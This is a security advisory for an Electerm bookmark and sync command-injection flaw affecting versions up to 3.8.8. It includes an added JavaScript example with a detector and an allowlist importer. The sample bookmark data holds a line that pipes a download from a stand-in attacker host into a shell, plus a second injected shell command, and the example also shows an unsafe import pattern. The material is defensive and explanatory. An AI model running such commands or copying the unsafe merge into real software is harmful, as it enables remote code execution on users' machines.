Impact
Electerm, an open-source terminal and remote-access client, contains a flaw that lets an attacker make the client execute arbitrary commands by injecting specially crafted fields into imported bookmark JSON files, or into global configuration values that are applied when a sync target is refreshed. The advisory classifies it as a persistent local-pty code execution vulnerability: when a tampered bookmark is opened or a sync operation is applied, the injected exec* fields or modified global settings are processed and executed with the privileges of the user running Electerm. Although the payload runs locally, the attacker only needs to deliver the file or control the sync target, so the net effect is remote code execution on the victim's machine.
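The bug class described above, untrusted bookmark JSON merged wholesale into a configuration object that later drives local command execution, is modelled here as an added example. This is not Electerm's code and does not reproduce its schema: the field names (execBeforeConnect, execWrapper, the allowlisted bookmark keys) and the sample export are constructed for illustration. The block shows a pre-import check that surfaces exec-style keys anywhere in the document, the unsafe import pattern that lets such keys through, and an allowlist importer that drops them.

```javascript
// Added example (not Electerm's code). Models the advisory's bug class:
// attacker-controlled exec* fields in a bookmark export survive import and
// are later acted on. Field names below are assumed, not Electerm's schema.

// Constructed sample bookmark export: entry [1] carries a top-level exec*
// field, entry [2] hides one inside a nested object.
const SAMPLE_BOOKMARK_JSON = JSON.stringify([
  { title: "prod-db", host: "10.0.0.5", port: 22, username: "ops", type: "ssh" },
  {
    title: "jump", host: "jump.example.test", port: 22, username: "ops", type: "ssh",
    execBeforeConnect: "curl https://attacker.example.test/x | sh",
  },
  {
    title: "lab", host: "lab.example.test", port: 2222, username: "dev", type: "ssh",
    extra: { execWrapper: "/bin/sh -c 'id > /tmp/pwned'" },
  },
]);

// Fields a bookmark importer legitimately needs (assumed allowlist).
const ALLOWED_BOOKMARK_FIELDS = ["title", "host", "port", "username", "type"];

// Walk a parsed JSON value and return the dotted path of every key that
// starts with "exec" (case-insensitive), at any depth, in document order.
function findExecFields(value, path = "", out = []) {
  if (Array.isArray(value)) {
    value.forEach((v, i) => findExecFields(v, `${path}[${i}]`, out));
  } else if (value !== null && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) {
      const p = path ? `${path}.${k}` : k;
      if (/^exec/i.test(k)) out.push(p);
      findExecFields(v, p, out);
    }
  }
  return out;
}

// Vulnerable pattern: every field from the file lands on the bookmark
// object, so a later `if (bookmark.execBeforeConnect) spawn(...)` runs
// attacker input. Shown only to contrast with the safe importer.
function importBookmarksUnsafe(json) {
  return JSON.parse(json).map((b) => ({ ...b }));
}

// Hardened pattern: copy only allowlisted fields, type-check what is kept,
// and report every exec-style key that was present so the user can be warned.
function importBookmarksSafe(json) {
  const parsed = JSON.parse(json);
  if (!Array.isArray(parsed)) throw new Error("bookmark file must be a JSON array");
  const rejected = findExecFields(parsed);
  const bookmarks = parsed.map((b) => {
    const clean = {};
    for (const k of ALLOWED_BOOKMARK_FIELDS) {
      if (Object.prototype.hasOwnProperty.call(b, k)) clean[k] = b[k];
    }
    if (typeof clean.host !== "string" || !Number.isInteger(clean.port)) {
      throw new Error(`bookmark ${JSON.stringify(b.title)} has invalid host/port`);
    }
    return clean;
  });
  return { bookmarks, rejected };
}

// Usage: scan before import, refuse or warn if anything exec-like is found.
const scan = findExecFields(JSON.parse(SAMPLE_BOOKMARK_JSON));
console.log("exec-style fields in export:", scan);
console.log("safe import:", importBookmarksSafe(SAMPLE_BOOKMARK_JSON));
```

The same check applies to a sync payload pulled from a gist or WebDAV target: run findExecFields over the fetched document before any of it is merged into live settings, and treat a non-empty result as a reason to abort the refresh rather than as a field to silently strip.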
Affected Systems
All Electerm releases at or below version 3.8.8 are vulnerable. The issue manifests when users import bookmark files or enable Electerm sync (e.g., gist or WebDAV). Because the flaw lies in Electerm's internal bookmark handling, it is reachable regardless of which transport is used to synchronize data.
Risk and Exploitability
This vulnerability has a CVSS score of 9.4 (critical). No EPSS score is available, and it is not listed in the CISA KEV catalog. Exploitation requires the attacker to supply a malicious bookmark file or to compromise a sync target such as a gist or WebDAV server; once delivered, opening the bookmark or triggering a sync refresh executes arbitrary code with the local user's privileges, giving the attacker control of the affected system at that user's privilege level. Social engineering and compromised remote sync repositories are the primary delivery paths. Until Electerm is updated to a version later than 3.8.8, existing bookmark exports and synced configuration should be treated as untrusted input and reviewed before use.
OpenCVE Enrichment
Source: GitHub GHSA